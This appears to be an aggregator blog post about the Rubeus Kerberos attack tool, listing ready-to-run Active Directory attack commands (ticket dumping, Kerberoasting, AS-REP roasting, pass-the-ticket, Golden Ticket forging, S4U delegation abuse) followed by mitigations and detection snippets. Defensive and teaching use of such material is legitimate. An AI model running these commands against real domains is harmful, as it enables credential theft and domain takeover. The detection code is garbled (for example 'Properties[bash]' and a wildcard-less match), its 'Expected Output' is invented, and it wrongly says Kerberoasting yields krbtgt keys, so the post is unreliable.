Listen to this Post

Yuval Gordon from Akamai revealed a PowerShell script that leverages Rubeus to extract Kerberos keys and NTLM hashes for every principal—including krbtgt and machines—without requiring code execution on the Domain Controller.
What is Rubeus?
Rubeus is a powerful offensive security tool designed for Kerberos exploitation in Windows Active Directory (AD) environments. It enables attackers to:
– Extract Kerberos tickets
– Forge Golden/Silver tickets
– Perform Pass-the-Ticket (PtT) attacks
– Dump NTLM hashes
– Execute Kerberos Relay attacks
Key Features of Rubeus:
- Kerberos Ticket Extraction: Harvest TGTs and service tickets.
- Overpass-the-Hash: Convert NTLM hashes into Kerberos tickets.
- AS-REP Roasting: Retrieve AS-REP responses for offline cracking.
- S4U Attacks (Delegation Abuse): Impersonate users via constrained delegation.
You Should Know: Practical Rubeus Commands & Mitigations
1. Extracting Kerberos Tickets & NTLM Hashes
Dump all Kerberos tickets from memory Rubeus.exe dump Extract Kerberos keys for all users (including krbtgt) Rubeus.exe kerberoast /outfile:hashes.txt Request a TGT for a user (Pass-the-Ticket attack) Rubeus.exe asktgt /user:Administrator /rc4:<NTLM_HASH> /ptt
2. AS-REP Roasting Attack
Find users with Kerberos pre-authentication disabled Rubeus.exe asreproast /format:hashcat /outfile:asreproast_hashes.txt
3. Golden Ticket Attack
Forge a Golden Ticket using krbtgt hash Rubeus.exe golden /krbtgt:<KRBTGT_NTLM_HASH> /domain:corp.local /sid:<DOMAIN_SID> /user:fakeadmin /ptt
4. Pass-the-Hash to Kerberos Conversion
Convert NTLM hash to Kerberos ticket Rubeus.exe asktgt /user:Victim /rc4:<NTLM_HASH> /ptt
5. S4U Delegation Abuse
Impersonate a user via constrained delegation Rubeus.exe s4u /impersonateuser:Admin /msdsspn:http/web01.corp.local /altservice:cifs /ptt
Mitigation Strategies
- Enable Kerberos Armoring (FAST) – Prevents ticket theft.
2. Restrict NTLM Usage – Enforce Kerberos-only authentication.
- Monitor for Rubeus Execution – Detect command-line arguments like
dump,asktgt, orkerberoast. - Implement LSA Protection – Block credential dumping via
RunAsPPL. - Disable Unnecessary Delegation – Audit and restrict constrained/unconstrained delegation.
🔗 Microsoft Threat Encyclopedia: HackTool:Win64/Rubeus
What Undercode Say
Rubeus remains a critical tool in red teaming & adversary simulations, but defenders must proactively harden Kerberos, disable weak protocols, and monitor for anomalous ticket requests.
Expected Linux & Windows Commands for Detection
Linux (Detecting Kerberos anomalies with Zeek)
zeek -r kerberos_traffic.pcap Kerberos::log_kerberos
Windows (Detect Rubeus execution via PowerShell logs)
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $_.Message -like "Rubeus" }
Hunt for Kerberoasting attempts
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | Where-Object { $_.Properties[bash].Value -eq "0x40810000" }
Expected Output:
[+] Detected Rubeus execution: - Process: powershell.exe - Command: Rubeus.exe kerberoast /outfile:hashes.txt
Prediction
As Kerberos remains a prime target, future attacks will likely combine Rubeus with AI-driven automation to bypass detection. Defenders must adopt behavioral analytics and zero-trust models to counter these threats.
References:
Reported By: 0x534c Cybersecurity – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


